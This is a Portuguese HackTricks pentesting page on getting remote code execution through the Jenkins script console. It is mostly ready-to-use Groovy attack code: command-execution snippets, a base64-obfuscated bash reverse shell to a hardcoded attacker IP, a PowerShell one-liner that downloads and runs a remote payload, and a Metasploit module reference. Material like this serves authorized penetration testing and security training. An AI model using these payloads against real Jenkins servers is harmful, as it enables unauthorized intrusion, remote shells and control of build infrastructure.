Jenkins RCE with Groovy Script

Aprenda hacking no AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!

Outras formas de apoiar o HackTricks:

Jenkins RCE com Script Groovy

Isso é menos ruidoso do que criar um novo projeto no Jenkins

  1. Acesse path_jenkins/script

  2. Dentro da caixa de texto introduza o script

def process = "PowerShell.exe <WHATEVER>".execute()
println "Found text ${process.text}"

Você pode executar um comando usando: cmd.exe /c dir

No linux, você pode fazer: "ls /".execute().text

Se precisar usar aspas e aspas simples dentro do texto. Você pode usar """PAYLOAD""" (três aspas duplas) para executar o payload.

Outro script groovy útil é (substitua [INSERT COMMAND]):

def sout = new StringBuffer(), serr = new StringBuffer()
def proc = '[INSERT COMMAND]'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"

Shell reverso no Linux

def sout = new StringBuffer(), serr = new StringBuffer()
def proc = 'bash -c {echo,YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4yMi80MzQzIDA+JjEnCg==}|{base64,-d}|{bash,-i}'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"

Shell reverso no Windows

Você pode preparar um servidor HTTP com um shell reverso PS e usar o Jeking para baixar e executá-lo:

scriptblock="iex (New-Object Net.WebClient).DownloadString('http://192.168.252.1:8000/payload')"
echo $scriptblock | iconv --to-code UTF-16LE | base64 -w 0
cmd.exe /c PowerShell.exe -Exec ByPass -Nol -Enc <BASE64>

Script

Você pode automatizar esse processo com este script.

Você pode usar o MSF para obter um shell reverso:

msf> use exploit/multi/http/jenkins_script_console
Aprenda hacking em AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!

Outras formas de apoiar o HackTricks:

Última actualización